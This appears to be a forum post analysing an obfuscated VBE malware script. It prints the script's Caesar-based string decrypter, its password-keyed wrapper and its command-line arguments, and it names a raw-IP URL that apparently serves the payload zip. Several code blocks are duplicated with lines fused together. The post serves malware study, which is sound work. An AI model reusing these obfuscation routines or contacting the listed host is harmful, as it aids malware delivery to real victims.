Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem",,48)
For Each objItem in colItems
If InStr(objItem.SystemType, "86") <> 0 Then
X86orX64 = "x86"
ElseIf InStr(objItem.SystemType, "64") <> 0 Then
X86orX64 = "x64"
Else
X86orX64 = objItem.SystemType
End If
Next
Function DCaesar(str,offset)
Dim length,char,i
DCaesar = ""
length = Len(str)
For i = 1 To length
char = Mid(str,i,1)
If char >= "A" And char <= "Z" Then
char = Asc("Z") - (Asc("Z") - Asc(char) + offset) Mod 26
DCaesar = DCaesar & Chr(char)
ElseIf char >= "a" And char <= "z" Then
char = Asc("z") - (Asc("z") - Asc(char) + offset) Mod 26
DCaesar = DCaesar & Chr(char)
Else
DCaesar = DCaesar & char
End If
Next
End FunctionDCaesar = ""
length = Len(str)
For i = 1 To length
char = Mid(str,i,1)
If char >= "A" And char <= "Z" Then
char = Asc("Z") - (Asc("Z") - Asc(char) + offset) Mod 26
DCaesar = DCaesar & Chr(char)
ElseIf char >= "a" And char <= "z" Then
char = Asc("z") - (Asc("z") - Asc(char) + offset) Mod 26
DCaesar = DCaesar & Chr(char)
Else
DCaesar = DCaesar & char
End If
Next
Function MDnStr(OldStr,Pwd)
Dim newstr:newstr = ""
length = Len(Pwd)
lengthstr = Len(OldStr)
For i = 1 To lengthstr
char = Mid(OldStr,i,1)
p = i Mod length
If p = 0 Then p = 1
p = Mid(Pwd,p,1)
newstr = newstr & DCaesar(char,p)
Next
MDnStr = newstr
End Functionlength = Len(Pwd)
lengthstr = Len(OldStr)
For i = 1 To lengthstr
char = Mid(OldStr,i,1)
p = i Mod length
If p = 0 Then p = 1
p = Mid(Pwd,p,1)
newstr = newstr & DCaesar(char,p)
Next
MDnStr = newstr
If you remember my other analysis, you will recognized some codes / methods used
for example, from this post :
https://malwaretips.com/threads/scripted-samples-from-malware-vault-5-8-16-8.62121/#post-531277
3) Before some explanation of obfuscated parts (after the vbe decoding) :
I will end this first part with a try to remember you one encryption method you may have lean at school :
look at this function, and the name :
Function DCaesar(str,offset)
Dim length,char,i
DCaesar = ""
length = Len(str)
For i = 1 To length
char = Mid(str,i,1)
If char >= "A" And char <= "Z" Then
char = Asc("Z") - (Asc("Z") - Asc(char) + offset) Mod 26
DCaesar = DCaesar & Chr(char)
ElseIf char >= "a" And char <= "z" Then
char = Asc("z") - (Asc("z") - Asc(char) + offset) Mod 26
DCaesar = DCaesar & Chr(char)
Else
DCaesar = DCaesar & char
End If
Next
End FunctionDCaesar = ""
length = Len(str)
For i = 1 To length
char = Mid(str,i,1)
If char >= "A" And char <= "Z" Then
char = Asc("Z") - (Asc("Z") - Asc(char) + offset) Mod 26
DCaesar = DCaesar & Chr(char)
ElseIf char >= "a" And char <= "z" Then
char = Asc("z") - (Asc("z") - Asc(char) + offset) Mod 26
DCaesar = DCaesar & Chr(char)
Else
DCaesar = DCaesar & char
End If
Next
An "obfuscation" method which come from the famous Caesar
Some reading for you
Caesar cipher - Wikipedia, the free encyclopedia
"The transformation can be represented by aligning two alphabets; the cipher alphabet is the plain alphabet rotated left or right by some number of positions. For instance, here is a Caesar cipher using a left rotation of three places, equivalent to a right shift of 23 (the shift parameter is used as the key):
Plain: ABCDEFGHIJKLMNOPQRSTUVWXYZ
Cipher: XYZABCDEFGHIJKLMNOPQRSTUVW
When encrypting, a person looks up each letter of the message in the "plain" line and writes down the corresponding letter in the "cipher" line.
Plaintext: THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG
Ciphertext: QEB NRFZH YOLTK CLU GRJMP LSBO QEB IXWV ALD
Deciphering is done in reverse, with a right shift of 3.
The replacement remains the same throughout the message, so the cipher is classed as a type of monoalphabetic substitution, as opposed to polyalphabetic substitution."
The script uses the DCaesar function as sub-function of main decrypter function
(if not, it would have been too "lol")
Command line arguments used by the script:
bji=WScript.Arguments(0)
strpwd=WScript.Arguments(1) // string as password
appurl=WScript.Arguments(2) // appurl encrypted
strpwd=WScript.Arguments(1) // string as password
appurl=WScript.Arguments(2) // appurl encrypted
And this is where the second argument from command line is important : Pwd
Function MDnStr(OldStr,Pwd)
Dim newstr:newstr = ""
length = Len(Pwd)
lengthstr = Len(OldStr)
For i = 1 To lengthstr
char = Mid(OldStr,i,1)
p = i Mod length
If p = 0 Then p = 1
p = Mid(Pwd,p,1)
newstr = newstr & DCaesar(char,p)
Next
MDnStr = newstr
End Functionlength = Len(Pwd)
lengthstr = Len(OldStr)
For i = 1 To lengthstr
char = Mid(OldStr,i,1)
p = i Mod length
If p = 0 Then p = 1
p = Mid(Pwd,p,1)
newstr = newstr & DCaesar(char,p)
Next
MDnStr = newstr
---------------------------------------------------------------------------------------------------------------------------
Warning :
http://67.227.173.54:88/tyaz.zip" => "\\isst.zip"
In part 4) I will comment some important parts of the script / functions
and show you how we can obtain the password parameter by some reasoning/ reversing (remember that we only have the malware script, not the arguments used in the command line )
Last edited: